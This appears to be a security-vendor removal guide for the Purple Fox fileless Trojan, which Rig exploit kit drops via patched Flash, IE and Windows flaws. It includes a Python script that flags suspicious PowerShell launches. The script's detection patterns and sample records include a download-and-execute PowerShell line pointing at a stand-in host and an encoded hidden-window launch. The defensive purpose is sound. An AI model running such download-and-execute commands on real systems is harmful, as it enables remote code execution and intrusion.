Purple Fox Removal Guide

Category: Trojans

Purple Fox is a vicious Trojan that can avoid detection and infect attacked computers with cryptocurrency miners and other malicious programs. No one would want to receive such a threat, which is why we recommend reading our full report so you can learn how to protect your computer from it. Researchers believe that the malware could infect the machines of both regular home users and various organizations. Since detecting the malware can be a tough task, erasing it can be even more challenging. This is why, this time, we are not adding manual deletion instructions at the end of this article. Victims of this Trojan are advised to seek the assistance of cybersecurity specialists who could remove Purple Fox for them, or to use advanced antimalware software capable of detecting and erasing such a threat.

While it might be tricky to detect Purple Fox, we can tell what kind of devices it might target. Trend Micro specialists who have researched this malicious application in detail discovered that it is being dropped on systems by the Rig exploit kit. This tool can exploit the CVE-2018-15982, CVE-2014-6332, and CVE-2018-8174 vulnerabilities. The first weakness can be found in particular Adobe Flash versions, the second one is located in old Internet Explorer variants, and the third one could affect different Windows versions.

All of the listed vulnerabilities have already been patched, which means that all users need to do to ensure that threats like the Rig exploit kit cannot misuse them is download and apply the necessary patches. Some users are hesitant to install patches because they think it might be a waste of time. In truth, getting updates regularly might save you the time you would otherwise spend figuring out what happened to your computer and how to fix it if a threat like Purple Fox manages to sneak in.

Users should also know that the Rig exploit kit might be spread via suspicious pop-ups, other advertisements, or unreliable websites. After a victim interacts with such content, the exploit kit checks whether the computer has one of the weaknesses it can exploit. If it succeeds, it should launch Purple Fox. Specialists discovered that this Trojan could run on a system without having to download or create any data. Consequently, security tools that detect threats by searching for malicious files might fail to detect it. Such malicious software is called fileless malware. Instead of creating files, such threats run on machines by abusing tools that are already available on them. For instance, Purple Fox abuses PowerShell.
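Because nothing is written to disk, the place to look is process-creation logging instead of the file system. The Python sketch below is an added example, not code from this article or from Trend Micro's research: it flags PowerShell launches that come from a browser or use in-memory execution options. The record layout, the rule names and the sample records are assumptions constructed for illustration, and the rules are generic heuristics, not Purple Fox signatures.

```python
import re

# Assumption: each record is (parent image, image, command line), as exported
# from process-creation logging such as Windows event 4688 or Sysmon event 1.
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Generic in-memory execution heuristics, not Purple Fox signatures.
TEXT_RULES = {
    "download_to_memory": re.compile(r"(?i)downloadstring|downloaddata"),
    "invoke_expression": re.compile(r"(?i)\biex\b|invoke-expression"),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def reasons_for(parent, image, cmdline):
    """Return the sorted heuristics that a PowerShell launch trips."""
    if basename(image) not in POWERSHELL:
        return []
    hits = {name for name, rx in TEXT_RULES.items() if rx.search(cmdline)}
    if basename(parent) in BROWSERS:
        hits.add("browser_parent")  # browsers rarely have a reason to spawn PowerShell
    toks = cmdline.split()
    for flag, value in zip(toks, toks[1:]):
        if flag[0] not in "-/" or len(flag) < 2:
            continue
        name = flag[1:].lower()
        # powershell.exe accepts abbreviated parameter names (-e, -enc, -w, ...).
        if (name == "ec" or "encodedcommand".startswith(name)) and B64.fullmatch(value):
            hits.add("encoded_command")
        if "windowstyle".startswith(name) and value.lower() in ("hidden", "1"):
            hits.add("hidden_window")
    return sorted(hits)

def triage(records):
    """Map record index -> reasons, for records that trip at least one rule."""
    found = ((i, reasons_for(*rec)) for i, rec in enumerate(records))
    return {i: reasons for i, reasons in found if reasons}

SAMPLE = [  # constructed records, not taken from a real infection
    (r"C:\Windows\explorer.exe", "powershell.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
    ("iexplore.exe", "powershell.exe", "powershell.exe -nop -w hidden -e QQBCAEMARABFAEYARwBIAEkASgA="),
    ("cmd.exe", "powershell.exe",
     "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    ("chrome.exe", "chrome.exe", "chrome.exe --type=renderer"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE).items():
        print(idx, SAMPLE[idx][2], "->", ", ".join(reasons))
```

A hit is a reason to look closer, not proof of infection; administrative scripts also use encoded commands and hidden windows.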

As said earlier, this malware can infect a device with various other malicious applications. Researchers say that it mainly distributes cryptocurrency-mining tools. Hackers use such software to generate cryptocurrencies for themselves by using an infected device’s resources. Such activities may have visible effects on a machine, as they could slow down its performance. If your computer’s performance is important to you, it is best to take care of such threats as fast as possible.

All in all, due to Purple Fox’s capability to avoid detection, many users might not realize it is on their system. However, if your computer has the earlier mentioned vulnerabilities and you sometimes interact with unreliable ads or websites, you should keep in mind that you could be targeted. Naturally, we recommend patching at once any weaknesses that your computer might have. We also advise being more cautious while surfing the Internet. It might also help to keep a reputable antimalware tool that could protect your device against Trojans and other malicious applications.


Johnlery Triunfante and Earle Earnshaw. September 9, 2019. ‘Purple Fox’ Fileless Malware with Rookit Component Delivered by Rig Exploit Kit Now Abuses PowerShell. Trend Micro.


